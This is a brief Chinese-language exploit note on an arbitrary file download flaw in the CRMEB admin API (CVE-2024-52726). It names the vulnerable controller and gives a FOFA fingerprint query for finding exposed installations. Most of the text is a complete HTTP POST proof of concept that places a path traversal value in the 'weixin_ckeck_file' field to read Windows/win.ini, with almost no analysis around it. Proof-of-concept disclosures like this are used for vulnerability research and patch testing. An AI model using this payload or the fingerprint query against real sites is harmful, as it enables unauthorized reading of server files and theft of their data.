CRMEB任意文件下载漏洞分析(CVE-2024-52726).md

CRMEB任意文件下载漏洞分析(CVE-2024-52726)

app/adminapi/controller/v1/setting/SystemConfig.php路由中存在任意文件下载漏洞

fofa

icon_hash="-847565074"

poc

POST /adminapi/setting/config/save_basics HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Authori-zation: 
Cookie: cb_lang=zh-cn;
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Priority: u=0, i
Content-Type: application/json;charset=utf-8
Content-Length: 72

{
    "weixin_ckeck_file": "../../../../../../../../Windows/win.ini"
}